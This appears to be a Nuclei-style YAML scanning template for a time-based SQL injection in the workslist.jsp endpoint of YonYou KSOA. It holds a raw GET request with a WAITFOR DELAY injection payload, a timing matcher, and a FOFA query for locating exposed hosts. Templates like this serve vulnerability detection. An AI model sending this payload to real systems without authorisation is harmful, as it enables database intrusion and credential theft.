http:
    - matchers:
        - dsl:
            - status_code==200 && duration>=4 && duration<=5
          name: SQL注入
          type: dsl
      raw:
        - |
          GET /worksheet/workslist.jsp?id=1';WAITFOR+DELAY+'0:0:4'-- HTTP/1.1
          Host: {{Host}}
          Content-type:application/x-www-form-urlencoded
id: YonYou-KSOA-workslist-SQL
info:
    author: HuanXiong
    description: |-
        fofa: app="用友-时空KSOA"
        用友时空 KSOA workslist.jsp 接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限。
    name: 用友时空 KSOA workslist.jsp SQL注入
    reference:
        - null
    severity: high
    tags: []
